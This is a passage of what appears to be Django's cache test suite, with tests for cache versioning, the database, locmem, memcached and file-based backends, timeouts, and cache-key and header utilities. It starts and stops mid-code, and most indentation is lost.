caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertDictEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpickable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.add('unpickable', Unpickable())
def test_set_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.set('unpickable', Unpickable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
def test_get_or_set_version(self):
cache.get_or_set('brian', 1979, version=2)
with self.assertRaisesMessage(ValueError, 'You need to specify a value.'):
cache.get_or_set('brian')
with self.assertRaisesMessage(ValueError, 'You need to specify a value.'):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
        # The super call needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = six.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = six.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
memcached_never_expiring_params = memcached_params.copy()
memcached_never_expiring_params['TIMEOUT'] = None
memcached_far_future_params = memcached_params.copy()
memcached_far_future_params['TIMEOUT'] = 31536000 # 60*60*24*365, 1 year
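# A sample settings entry that would activate the memcached tests below
# (illustrative values; point LOCATION at a reachable memcached server):
#
#   CACHES = {
#       'memcached': {
#           'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
#           'LOCATION': '127.0.0.1:11211',
#       },
#   }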
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
        On memcached, we don't introduce a duplicate key validation
        step (for speed reasons); we just let the memcached API
        library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache_config in settings.CACHES.items():
if cache_config['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(base=memcached_never_expiring_params))
def test_default_never_expiring_timeout(self):
# Regression test for #22845
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
@override_settings(CACHES=caches_setting_for_tests(base=memcached_far_future_params))
def test_default_far_future_timeout(self):
# Regression test for #22845
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
cache.set('small_value', large_value)
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super(FileBasedCacheTests, self).tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
        self.assertTrue(os.path.exists(self.dirname))
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
        del self.DEFAULT_TIMEOUT
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
        keys with the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
    def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
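        # Helper for the test below: when i18n is active the locale is already
        # part of the cache key, so the raw Accept-Language value is redundant
        # and every Accept-Language value / Vary ordering must yield the same
        # reference key.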
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
